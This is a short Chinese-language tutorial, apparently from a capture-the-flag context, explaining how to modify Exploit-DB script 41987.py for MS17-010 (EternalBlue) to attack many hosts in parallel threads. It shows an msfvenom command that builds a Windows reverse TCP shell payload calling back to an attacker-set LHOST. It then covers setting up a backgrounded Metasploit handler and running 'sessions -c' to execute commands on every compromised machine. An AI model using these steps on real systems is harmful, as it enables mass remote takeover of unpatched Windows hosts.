41987.py+msfvenom+handler 实现批量get shell

基于41987.py文件

一、17010攻击CVE脚本

使用searchsploit 命令查找ms17-010的系统自带漏洞脚本
找到41987.py,保留源文件不动,复制出来
67030-y0lgey81u5p.png
对41987.py进行修改:

  1. 导入线程threading模块
  2. Mod_replay函数处添加参数(user_shellcode)
    92148-d8jb7ndzvb.png
  3. 注释掉原shellcode一行
  4. 添加shellcode=user_shellcode
    42281-y46xa9lsgve.png
  5. 主函数处添加(hostip)参数
  6. 主函数下添加 user_shellcode=open(‘shellcode文件名’,’rb’).read()
  7. 参数传入函数 mod_replay(user_shellcode)
  8. 注释掉 os.remove(“smb.dat”) 这行,会影响多线程
    37101-3sh6h0d9qur.png
  9. 注释掉main读数据的这行
  10. 添加hostip,写成threading
    47740-rtyslcv5n1d.png

二、SHELLCODE生成

通过命令生成shellcode

Msfvenom –p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx –f raw > shell

19784-f3bduceu4qd.png
运行修改后的41987.py
86576-o9rs7748ed.png

三、MSF handler监听设置

打开msf,设置对应的payload
exploit –zj
-zj参数让返回的会话在后台
39983-y5tci2qp9ej.png
Sessions –c “type C:\flagvalue.txt && 其他操作”
-c 参数对所有会话执行命令,即可get flag值以及del flag
86462-01xupygf4a4v.png